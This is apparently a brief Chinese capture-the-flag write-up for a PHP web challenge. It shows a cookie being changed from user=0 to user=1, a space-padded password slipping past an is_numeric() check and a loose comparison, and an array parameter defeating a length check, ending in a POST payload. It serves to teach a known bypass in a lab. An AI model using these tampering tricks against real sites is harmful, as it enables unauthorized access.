查看源代码，到payflag页面，这里有个提示：

Flag need your 100000000 money

attention

If you want to buy the FLAG:
You must be a student from CUIT!!!
You must be answer the correct password!!!

查了下CUIT是阿根廷的意思，我把Accept-Language改成了es-ar，不过后来测试没有什么影响。。
把Cookie里的user=0改成user=1

最底下有一行注释：

<!--
	~~~post money and password~~~
if (isset($_POST['password'])) {
	$password = $_POST['password'];
	if (is_numeric($password)) {
		echo "password can't be number</br>";
	}elseif ($password == 404) {
		echo "Password Right!</br>";
	}
}
-->

is_numberic()绕过，传参的时候把password后的404加个空格就好啦。
然后传入money=100000000提示Nember lenth is too long，直接数组绕过。

payload：
password=404 &money[]=100000000